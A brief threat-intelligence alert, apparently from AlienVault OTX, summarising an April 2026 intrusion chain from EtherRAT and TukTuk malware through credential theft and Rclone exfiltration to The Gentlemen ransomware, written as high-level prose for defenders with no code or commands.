Flash Alert: EtherRat and TukTuk C2 End in The Gentleman Ransomware

An intrusion was observed in April 2026 where threat actors deployed EtherRAT malware through a malicious MSI installer disguised as a Sysinternals tool. The malware utilized Ethereum blockchain via EtherHiding for dynamic C2 configuration updates. Following reconnaissance activities, actors deployed TukTuk malware framework using DLL sideloading techniques with legitimate applications like Greenshot and SyncTrayzor. TukTuk established C2 channels through SaaS platforms including ClickHouse and Supabase, with backup channels via Ably, Dropbox, and GitHub Issues. The actors performed Kerberoasting, credential theft via Mimikatz and LSASS dumping, and deployed GoTo Resolve RMM tooling for lateral movement. Data exfiltration to Wasabi cloud storage was conducted using Rclone before deploying The Gentlemen ransomware domain-wide through a malicious GPO. The intrusion leveraged blockchain infrastructure, SaaS platforms, and decentralized services to evade traditional network defenses.

Pulse ID: 6a0200aec25a59a6b9d4edcf
Pulse Link: https://otx.alienvault.com/pulse/6a0200aec25a59a6b9d4edcf
Pulse Author: AlienVault
Created: 2026-05-11 16:15:42

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#BlockChain #Cloud #CyberSecurity #Dropbox #EtherHiding #GitHub #InfoSec #Malware #OTX #OpenThreatExchange #RAT #RansomWare #Rclone #SideLoading #UK #bot #AlienVault